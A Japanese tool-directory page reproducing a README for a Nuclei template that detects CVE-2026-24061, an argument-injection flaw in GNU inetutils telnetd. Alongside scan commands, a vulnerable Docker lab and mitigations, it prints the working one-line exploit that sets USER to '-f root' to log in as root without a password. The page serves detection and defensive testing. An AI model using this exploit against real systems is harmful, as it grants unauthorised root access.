Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mr-zapi/cve-2026-24061
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ネットワークセキュリティペネトレーションテスト学習と教育
GitHubmr-zapi/cve-2026-24061

CVE-2026-24061

Nucleiテンプレート:CVE-2026-24061を検出するためのもの。これはGNU inetutils telnetdにおける深刻なtelnet引数インジェクションであり、認証なしのrootアクセスを許可します。

リポジトリを見る
17ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-24061 - Telnet 引数インジェクション

GNU inetutils telnetd の CVE-2026-24061 脆弱性を検出するための Nuclei テンプレート。認証なしで root アクセスを取得することが可能です。

📋 脆弱性の説明

CVE-2026-24061 は、GNU inetutils telnetd における深刻な 引数インジェクション 脆弱性であり、攻撃者がパスワードを知らなくても root shell を取得できるようにします。

仕組みは?

  1. 問題の根本: 2015年、telnetd に動的パラメータ %U を含む新しいログインテンプレートが追加されました:
root@kitploit:~
   /usr/bin/login -p -h %h %?u{-f %u}{%U}
  1. 脆弱性: 環境変数 USER は telnet プロトコル(RFC 1572 NEW-ENVIRON)を介して渡され、コマンドへの代入前に サニタイズされません。

  2. 悪用: 攻撃者は接続時に USER="-f root" を設定します:

root@kitploit:~
   USER="-f root" telnet -a target.com 23
  1. 結果: ログインコマンドは次のようになります:
root@kitploit:~
   /usr/bin/login -p -h hostname -f root

-f フラグは「認証スキップ」を意味します → パスワードなしで root 💀

🎯 影響を受けるバージョン

  • 脆弱なログインテンプレートを使用する GNU inetutils telnetd
  • 例: inetutils-telnetd 2:2.0-1+deb11u2
  • Kerberos なしで自動ログインを使用する telnetd を搭載したシステム

🚀 使用方法

基本スキャン

root@kitploit:~
nuclei -t cve-2026-24061.yaml -u target.com:23 -code

複数ターゲット

root@kitploit:~
nuclei -t cve-2026-24061.yaml -l targets.txt -code

🔬 テストラボ

テスト用に脆弱な Docker コンテナを起動できます:

root@kitploit:~
FROM debian:11-slim

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y --no-install-recommends \
      inetutils-telnetd=2:2.0-1+deb11u2 \
      telnet && \
    rm -rf /var/lib/apt/lists/*

RUN useradd user1 && \
    sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf

EXPOSE 23

CMD ["/usr/sbin/inetutils-inetd", "-d"]

起動:

root@kitploit:~
# イメージをビルド
docker build -t vuln-telnetd .

# 起動
docker run -d -p 2323:23 vuln-telnetd

# 脆弱性を確認
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v

🛡️ 防御策

  1. inetutils を修正版に更新する
  2. telnetd を無効化 し、SSH を使用する
  3. ファイアウォールでポート 23 をフィルタリング する
  4. telnet への接続を監視 する

📚 リンク

  • NVD - CVE-2026-24061
  • SafeBreach Labs - Root Cause Analysis

📊 CVSS スコア

9.8 / 10 - Critical

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • AV:N - Network(ネットワーク経由の攻撃)
  • AC:L - Low complexity(悪用が容易)
  • PR:N - No privileges required(認証が不要)
  • UI:N - No user interaction(自動的な悪用)
  • C:H/I:H/A:H - 機密性、完全性、可用性への影響が高い

⚠️ 免責事項

このツールは、明示的な許可を得たシステムに対する合法的なセキュリティテストのみを目的としています。

作者は、このテンプレートの不正使用について一切の責任を負いません。

👤 作者

Created by Mr.Zapi

ツールをダウンロード